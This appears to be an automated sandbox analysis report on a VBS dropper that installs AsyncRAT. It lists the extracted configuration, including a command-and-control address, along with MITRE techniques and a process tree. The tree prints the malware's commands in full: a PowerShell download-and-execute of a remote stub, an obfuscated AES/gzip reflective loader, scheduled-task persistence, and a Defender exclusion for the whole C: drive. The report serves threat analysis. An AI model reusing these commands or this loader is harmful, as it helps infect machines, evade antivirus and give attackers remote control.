asyncrat | 18953637935c5dd79eeb9783f6d96fef1746fdd9cb5d3b449ef8f9a16af8758f

Analysis

max time kernel
97s
max time network
98s
platform
windows11-21h2_x64
resource
win11-20241007-en
resource tags

arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system
submitted
09-12-2024 17:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6890_output.vbs
Size

46KB
MD5

653bf44f38fbe35cb4a51a366cce85e1
SHA1

5f08110e8b8174d62eb8beb3d8eedf507dc6471c
SHA256

0442d85e2af50c1f41e7cbf46850a204cf7cfd49eb5f0244e8b60cc28c313c24
SHA512

ed5c78d769eed4667ce8cceb14af498fcf41c36db88e47611f2157708513955a188a9aa60404cb99f632ca2b10596dfad60df3a9320083b92da14529ebdded19
SSDEEP

768:msJNohJ2GoBFClzkP/TFYgZutKI/OLixhGpOQU40GmaXQq9+RfomiJrW7PuA9:mTWGsClzkmtKIxGp1UOmWYfomiKH

Score

10^/10

asyncrat default discovery execution rat

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

Default

87.120.113.125:55644

Mutex

WzRdrlEJS302

Attributes

delay
3
install
true
install_file
dwmm.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral4/memory/3764-189-0x00000000051A0000-0x00000000051B2000-memory.dmp	family_asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	4972	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
4972	powershell.exe
1440	powershell.exe
2968	powershell.exe
2488	powershell.exe
2256	powershell.exe
4796	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
2768	dwmm.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 17 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	timeout.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	dwmm.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Delays execution with timeout.exe 3 IoCs

evasion

pid	Process
4412	timeout.exe
4688	timeout.exe
4432	timeout.exe

Kills process with taskkill 1 IoCs

evasion

pid	Process
2420	taskkill.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
228	schtasks.exe

Suspicious behavior: EnumeratesProcesses 39 IoCs

pid	Process
4972	powershell.exe
4972	powershell.exe
4796	powershell.exe
4796	powershell.exe
3704	powershell.exe
3704	powershell.exe
1440	powershell.exe
1440	powershell.exe
3144	powershell.exe
3144	powershell.exe
2968	powershell.exe
2968	powershell.exe
3764	powershell.exe
3764	powershell.exe
2488	powershell.exe
2488	powershell.exe
4668	powershell.exe
4668	powershell.exe
2256	powershell.exe
2256	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
3764	powershell.exe
2768	dwmm.exe
2768	dwmm.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4972	powershell.exe
Token: SeDebugPrivilege	4796	powershell.exe
Token: SeDebugPrivilege	2420	taskkill.exe
Token: SeDebugPrivilege	3704	powershell.exe
Token: SeDebugPrivilege	1440	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeIncreaseQuotaPrivilege	3144	powershell.exe
Token: SeSecurityPrivilege	3144	powershell.exe
Token: SeTakeOwnershipPrivilege	3144	powershell.exe
Token: SeLoadDriverPrivilege	3144	powershell.exe
Token: SeSystemProfilePrivilege	3144	powershell.exe
Token: SeSystemtimePrivilege	3144	powershell.exe
Token: SeProfSingleProcessPrivilege	3144	powershell.exe
Token: SeIncBasePriorityPrivilege	3144	powershell.exe
Token: SeCreatePagefilePrivilege	3144	powershell.exe
Token: SeBackupPrivilege	3144	powershell.exe
Token: SeRestorePrivilege	3144	powershell.exe
Token: SeShutdownPrivilege	3144	powershell.exe
Token: SeDebugPrivilege	3144	powershell.exe
Token: SeSystemEnvironmentPrivilege	3144	powershell.exe
Token: SeRemoteShutdownPrivilege	3144	powershell.exe
Token: SeUndockPrivilege	3144	powershell.exe
Token: SeManageVolumePrivilege	3144	powershell.exe
Token: 33	3144	powershell.exe
Token: 34	3144	powershell.exe
Token: 35	3144	powershell.exe
Token: 36	3144	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeIncreaseQuotaPrivilege	2968	powershell.exe
Token: SeSecurityPrivilege	2968	powershell.exe
Token: SeTakeOwnershipPrivilege	2968	powershell.exe
Token: SeLoadDriverPrivilege	2968	powershell.exe
Token: SeSystemProfilePrivilege	2968	powershell.exe
Token: SeSystemtimePrivilege	2968	powershell.exe
Token: SeProfSingleProcessPrivilege	2968	powershell.exe
Token: SeIncBasePriorityPrivilege	2968	powershell.exe
Token: SeCreatePagefilePrivilege	2968	powershell.exe
Token: SeBackupPrivilege	2968	powershell.exe
Token: SeRestorePrivilege	2968	powershell.exe
Token: SeShutdownPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeSystemEnvironmentPrivilege	2968	powershell.exe
Token: SeRemoteShutdownPrivilege	2968	powershell.exe
Token: SeUndockPrivilege	2968	powershell.exe
Token: SeManageVolumePrivilege	2968	powershell.exe
Token: 33	2968	powershell.exe
Token: 34	2968	powershell.exe
Token: 35	2968	powershell.exe
Token: 36	2968	powershell.exe
Token: SeIncreaseQuotaPrivilege	2968	powershell.exe
Token: SeSecurityPrivilege	2968	powershell.exe
Token: SeTakeOwnershipPrivilege	2968	powershell.exe
Token: SeLoadDriverPrivilege	2968	powershell.exe
Token: SeSystemProfilePrivilege	2968	powershell.exe
Token: SeSystemtimePrivilege	2968	powershell.exe
Token: SeProfSingleProcessPrivilege	2968	powershell.exe
Token: SeIncBasePriorityPrivilege	2968	powershell.exe
Token: SeCreatePagefilePrivilege	2968	powershell.exe
Token: SeBackupPrivilege	2968	powershell.exe
Token: SeRestorePrivilege	2968	powershell.exe
Token: SeShutdownPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeSystemEnvironmentPrivilege	2968	powershell.exe
Token: SeRemoteShutdownPrivilege	2968	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4432 wrote to memory of 1116	4432	WScript.exe	77
PID 4432 wrote to memory of 1116	4432	WScript.exe	77
PID 1116 wrote to memory of 4972	1116	cmd.exe	79
PID 1116 wrote to memory of 4972	1116	cmd.exe	79
PID 4972 wrote to memory of 1412	4972	powershell.exe	81
PID 4972 wrote to memory of 1412	4972	powershell.exe	81
PID 1412 wrote to memory of 2184	1412	csc.exe	82
PID 1412 wrote to memory of 2184	1412	csc.exe	82
PID 4972 wrote to memory of 2440	4972	powershell.exe	83
PID 4972 wrote to memory of 2440	4972	powershell.exe	83
PID 4432 wrote to memory of 3488	4432	WScript.exe	89
PID 4432 wrote to memory of 3488	4432	WScript.exe	89
PID 3488 wrote to memory of 1964	3488	cmd.exe	91
PID 3488 wrote to memory of 1964	3488	cmd.exe	91
PID 1964 wrote to memory of 3576	1964	cmd.exe	93
PID 1964 wrote to memory of 3576	1964	cmd.exe	93
PID 1964 wrote to memory of 3704	1964	cmd.exe	94
PID 1964 wrote to memory of 3704	1964	cmd.exe	94
PID 1964 wrote to memory of 3704	1964	cmd.exe	94
PID 3704 wrote to memory of 1440	3704	powershell.exe	95
PID 3704 wrote to memory of 1440	3704	powershell.exe	95
PID 3704 wrote to memory of 1440	3704	powershell.exe	95
PID 3704 wrote to memory of 3144	3704	powershell.exe	96
PID 3704 wrote to memory of 3144	3704	powershell.exe	96
PID 3704 wrote to memory of 3144	3704	powershell.exe	96
PID 3704 wrote to memory of 2968	3704	powershell.exe	99
PID 3704 wrote to memory of 2968	3704	powershell.exe	99
PID 3704 wrote to memory of 2968	3704	powershell.exe	99
PID 3704 wrote to memory of 4692	3704	powershell.exe	101
PID 3704 wrote to memory of 4692	3704	powershell.exe	101
PID 3704 wrote to memory of 4692	3704	powershell.exe	101
PID 4692 wrote to memory of 2108	4692	cmd.exe	103
PID 4692 wrote to memory of 2108	4692	cmd.exe	103
PID 4692 wrote to memory of 2108	4692	cmd.exe	103
PID 2108 wrote to memory of 1016	2108	cmd.exe	105
PID 2108 wrote to memory of 1016	2108	cmd.exe	105
PID 2108 wrote to memory of 1016	2108	cmd.exe	105
PID 2108 wrote to memory of 3764	2108	cmd.exe	106
PID 2108 wrote to memory of 3764	2108	cmd.exe	106
PID 2108 wrote to memory of 3764	2108	cmd.exe	106
PID 3764 wrote to memory of 2488	3764	powershell.exe	107
PID 3764 wrote to memory of 2488	3764	powershell.exe	107
PID 3764 wrote to memory of 2488	3764	powershell.exe	107
PID 3764 wrote to memory of 4668	3764	powershell.exe	108
PID 3764 wrote to memory of 4668	3764	powershell.exe	108
PID 3764 wrote to memory of 4668	3764	powershell.exe	108
PID 1964 wrote to memory of 4412	1964	cmd.exe	109
PID 1964 wrote to memory of 4412	1964	cmd.exe	109
PID 3764 wrote to memory of 2256	3764	powershell.exe	111
PID 3764 wrote to memory of 2256	3764	powershell.exe	111
PID 3764 wrote to memory of 2256	3764	powershell.exe	111
PID 3764 wrote to memory of 3448	3764	powershell.exe	113
PID 3764 wrote to memory of 3448	3764	powershell.exe	113
PID 3764 wrote to memory of 3448	3764	powershell.exe	113
PID 3764 wrote to memory of 1612	3764	powershell.exe	114
PID 3764 wrote to memory of 1612	3764	powershell.exe	114
PID 3764 wrote to memory of 1612	3764	powershell.exe	114
PID 1612 wrote to memory of 4688	1612	cmd.exe	117
PID 1612 wrote to memory of 4688	1612	cmd.exe	117
PID 1612 wrote to memory of 4688	1612	cmd.exe	117
PID 3448 wrote to memory of 228	3448	cmd.exe	118
PID 3448 wrote to memory of 228	3448	cmd.exe	118
PID 3448 wrote to memory of 228	3448	cmd.exe	118
PID 2108 wrote to memory of 4432	2108	cmd.exe	119

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\6890_output.vbs"
1⤵
- Suspicious use of WriteProcessMemory
PID:4432
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /c powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1116
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -NoProfile -ExecutionPolicy Bypass -Command "iex (iwr -Uri https://emptyservices.xyz/stub.txt -UseBasicParsing -Headers @{ 'Authorization' = 'your_fixed_token_here' })"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4972
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dgp2iyu1\dgp2iyu1.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1412
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA066.tmp" "c:\Users\Admin\AppData\Local\Temp\dgp2iyu1\CSCD067139C266C44FC95EAB8884E91DAF3.TMP"
        5⤵
        
        PID:2184
  - - C:\windows\system32\cmstp.exe
      "C:\windows\system32\cmstp.exe" /au C:\windows\temp\ortpgyyt.inf
      4⤵
      PID:2440
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c.bat" "
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3488
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\c.bat"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1964
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\c.bat';$HtXR='ChLohBanLohBgLohBeExLohBteLohBnsLohBiLohBoLohBnLohB'.Replace('LohB', ''),'EnakFatrakFayPakFaoinakFatakFa'.Replace('akFa', ''),'DZRsYeZRsYcZRsYomZRsYpZRsYreZRsYsZRsYsZRsY'.Replace('ZRsY', ''),'CoCMmrpCMmryCMmrTCMmroCMmr'.Replace('CMmr', ''),'GefhddtCfhddurfhddrenfhddtfhddPfhddrocfhddefhddssfhdd'.Replace('fhdd', ''),'EleBsgfmeBsgfntABsgftBsgf'.Replace('Bsgf', ''),'FrTYXjomBTYXjaseTYXj64TYXjStrTYXjingTYXj'.Replace('TYXj', ''),'ReCDPWaCDPWdCDPWLiCDPWnesCDPW'.Replace('CDPW', ''),'TraKWcknKWcksfoKWckrKWckmFKWckinKWckaKWcklBKWckloKWckcKWckkKWck'.Replace('KWck', ''),'MjblMajblMijblMnjblMMjblMojblMdjblMuljblMejblM'.Replace('jblM', ''),'SnrJTplinrJTtnrJT'.Replace('nrJT', ''),'CrOEfHeaOEfHtOEfHeDeOEfHcryOEfHptoOEfHrOEfH'.Replace('OEfH', ''),'LBxjCoBxjCadBxjC'.Replace('BxjC', ''),'IjtXpnvjtXpojtXpkjtXpejtXp'.Replace('jtXp', '');powershell -w hidden;function wyHTI($FyZFc){$vRVbM=[System.Security.Cryptography.Aes]::Create();$vRVbM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vRVbM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vRVbM.Key=[System.Convert]::($HtXR[6])('3eo8NN5tyKFa5visFn25QtJ0+4AjjFD7mC5TBO0PoNc=');$vRVbM.IV=[System.Convert]::($HtXR[6])('zdwkfoYoSPrzLDtsSJb42A==');$LDSfU=$vRVbM.($HtXR[11])();$ZfRpI=$LDSfU.($HtXR[8])($FyZFc,0,$FyZFc.Length);$LDSfU.Dispose();$vRVbM.Dispose();$ZfRpI;}function XfTte($FyZFc){$eHJHJ=New-Object System.IO.MemoryStream(,$FyZFc);$RoEKy=New-Object System.IO.MemoryStream;$bZzEN=New-Object System.IO.Compression.GZipStream($eHJHJ,[IO.Compression.CompressionMode]::($HtXR[2]));$bZzEN.($HtXR[3])($RoEKy);$bZzEN.Dispose();$eHJHJ.Dispose();$RoEKy.Dispose();$RoEKy.ToArray();}$FWOcx=[System.IO.File]::($HtXR[7])([Console]::Title);$ALHOl=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 5).Substring(2))));$wRWWL=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 6).Substring(2))));[System.Reflection.Assembly]::($HtXR[12])([byte[]]$wRWWL).($HtXR[1]).($HtXR[13])($null,$null);[System.Reflection.Assembly]::($HtXR[12])([byte[]]$ALHOl).($HtXR[1]).($HtXR[13])($null,$null); "
      4⤵
      PID:3576
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3704
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1440
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\c')
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3144
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 81503' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network81503Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        5⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2968
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\Network81503Man.cmd"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:4692
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\Network81503Man.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:2108
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\Network81503Man.cmd';$HtXR='ChLohBanLohBgLohBeExLohBteLohBnsLohBiLohBoLohBnLohB'.Replace('LohB', ''),'EnakFatrakFayPakFaoinakFatakFa'.Replace('akFa', ''),'DZRsYeZRsYcZRsYomZRsYpZRsYreZRsYsZRsYsZRsY'.Replace('ZRsY', ''),'CoCMmrpCMmryCMmrTCMmroCMmr'.Replace('CMmr', ''),'GefhddtCfhddurfhddrenfhddtfhddPfhddrocfhddefhddssfhdd'.Replace('fhdd', ''),'EleBsgfmeBsgfntABsgftBsgf'.Replace('Bsgf', ''),'FrTYXjomBTYXjaseTYXj64TYXjStrTYXjingTYXj'.Replace('TYXj', ''),'ReCDPWaCDPWdCDPWLiCDPWnesCDPW'.Replace('CDPW', ''),'TraKWcknKWcksfoKWckrKWckmFKWckinKWckaKWcklBKWckloKWckcKWckkKWck'.Replace('KWck', ''),'MjblMajblMijblMnjblMMjblMojblMdjblMuljblMejblM'.Replace('jblM', ''),'SnrJTplinrJTtnrJT'.Replace('nrJT', ''),'CrOEfHeaOEfHtOEfHeDeOEfHcryOEfHptoOEfHrOEfH'.Replace('OEfH', ''),'LBxjCoBxjCadBxjC'.Replace('BxjC', ''),'IjtXpnvjtXpojtXpkjtXpejtXp'.Replace('jtXp', '');powershell -w hidden;function wyHTI($FyZFc){$vRVbM=[System.Security.Cryptography.Aes]::Create();$vRVbM.Mode=[System.Security.Cryptography.CipherMode]::CBC;$vRVbM.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$vRVbM.Key=[System.Convert]::($HtXR[6])('3eo8NN5tyKFa5visFn25QtJ0+4AjjFD7mC5TBO0PoNc=');$vRVbM.IV=[System.Convert]::($HtXR[6])('zdwkfoYoSPrzLDtsSJb42A==');$LDSfU=$vRVbM.($HtXR[11])();$ZfRpI=$LDSfU.($HtXR[8])($FyZFc,0,$FyZFc.Length);$LDSfU.Dispose();$vRVbM.Dispose();$ZfRpI;}function XfTte($FyZFc){$eHJHJ=New-Object System.IO.MemoryStream(,$FyZFc);$RoEKy=New-Object System.IO.MemoryStream;$bZzEN=New-Object System.IO.Compression.GZipStream($eHJHJ,[IO.Compression.CompressionMode]::($HtXR[2]));$bZzEN.($HtXR[3])($RoEKy);$bZzEN.Dispose();$eHJHJ.Dispose();$RoEKy.Dispose();$RoEKy.ToArray();}$FWOcx=[System.IO.File]::($HtXR[7])([Console]::Title);$ALHOl=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 5).Substring(2))));$wRWWL=XfTte (wyHTI ([Convert]::($HtXR[6])([System.Linq.Enumerable]::($HtXR[5])($FWOcx, 6).Substring(2))));[System.Reflection.Assembly]::($HtXR[12])([byte[]]$wRWWL).($HtXR[1]).($HtXR[13])($null,$null);[System.Reflection.Assembly]::($HtXR[12])([byte[]]$ALHOl).($HtXR[1]).($HtXR[13])($null,$null); "
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1016
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3764
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2488
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\Network81503Man')
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4668
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 81503' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Network81503Man.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2256
        
        C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "dwmm" /tr '"C:\Users\Admin\AppData\Roaming\dwmm.exe"' & exit
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:3448
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /f /sc onlogon /rl highest /tn "dwmm" /tr '"C:\Users\Admin\AppData\Roaming\dwmm.exe"'
        9⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:228
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpCA50.tmp.bat""
        8⤵
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:1612
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout 3
        9⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4688
        
        C:\Users\Admin\AppData\Roaming\dwmm.exe
        
        "C:\Users\Admin\AppData\Roaming\dwmm.exe"
        9⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2768
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /nobreak /t 1
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:4432
  - - C:\Windows\system32\timeout.exe
      timeout /nobreak /t 1
      4⤵
      Delays execution with timeout.exe
      PID:4412

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden -c .('Add-MpP' + 'reference') -ExclusionPath C:\ -ExclusionProcess powershell.exe
1⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4796

C:\Windows\system32\taskkill.exe
taskkill /IM cmstp.exe /F
1⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2420

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
627073ee3ca9676911bee35548eff2b8

SHA1
4c4b68c65e2cab9864b51167d710aa29ebdcff2e

SHA256
85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c

SHA512
3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

Filesize
1KB

MD5
5b74da6778ccaa0e1ca4ae7484775943

SHA1
0a2f6f315a0ca1a0366b509aec7b13c606645654

SHA256
172282931d7eeb60228e6b9b4b913fd78c73f2a7855620f35fb24a5c847b6c78

SHA512
20b4cb7174f49b22426b249f1dfc8f6273f50d1502536e773f4dcd073bf027f2a554d2437c2dc628dbe021c5c3b968b2d89f810ff1bb19630c1560e7feee1a1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
19KB

MD5
207f549470015e331005a6c933be2b03

SHA1
6d125eef72aa089088b31b620f8a9aed8927a082

SHA256
2220d8c509722f4e6ce4f09b4fb8cc642da403ea3bc7d3f68476e89aa173f10d

SHA512
cdf852ac821f75c0f5047952265830257a2ad45c9d5ad61036df58e87e7bdd266151ed52c1e05dacb186f61cb1d945fac675d5dd3e00845e3dc26c339aca9928

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
20KB

MD5
7ae92eccef491dd6382adcd237a106bf

SHA1
53016a102038489951cb545352f865bb7fd180e9

SHA256
cd5debacd6da7290c0168be1c2bed3385e940be29ca8b720a89c56d628ca56c3

SHA512
1cc7314a50dcaac2506339af830ac76960353a96d1b40831814edba79b136e4203892a90c9f7c679c1a58595f9bbccad048c64e69f1004bc4d2b05e278a58e7e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
20KB

MD5
4a1083defb33f0cf07f3b2b80b25cd5b

SHA1
ed02d4f4607a64fe9a2b2febc2787101c27a45d7

SHA256
899f9540569d4bf2bb800b390910434c5f82d8606663e9ea996c82cee658d3b9

SHA512
